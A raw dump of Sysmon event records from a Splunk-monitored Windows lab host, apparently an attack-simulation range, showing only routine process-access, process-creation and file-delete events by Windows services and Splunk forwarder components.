16:27:22.984{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245454Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245453Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245452Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245451Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245450Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245449Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-516A-6063-A622-00000000AF01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245448Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-516A-6063-A622-00000000AF01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245447Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.984{CB4067E1-516A-6063-A622-00000000AF01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245446Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.437{CB4067E1-516A-6063-A522-00000000AF01}3241504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000245445Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=701AE9C3DD3955BD51D6A15C533D4205,SHA256=DFEA6BAA90A5B8352E41AA2596954BF4EDB36414672C876B93C0A5757234142A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245444Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-516A-6063-A522-00000000AF01}324C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245443Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245442Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245441Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245440Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245439Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245438Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245437Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245436Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245435Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245434Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-516A-6063-A522-00000000AF01}324C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245433Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-516A-6063-A522-00000000AF01}324C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245432Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.313{CB4067E1-516A-6063-A522-00000000AF01}324C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245431Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:22.312{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F8AEB49A5AC3E0775448B19ACB57297,SHA256=FADF37F44E3CB9A047CD4A84E58F9F602D191B0C329288ADD7EEF45639B0A034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060812Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:23.342{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BCDDBA13A8A16BDAD214D4BEEF26440,SHA256=B9AA227978A0570AEB2A9AFD87B75A4BC51672300E928311BDB6EF4A8D45C5ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245476Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.765{CB4067E1-516B-6063-A722-00000000AF01}34523240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245475Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:23.656{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-516B-6063-A722-00000000AF01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245474Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 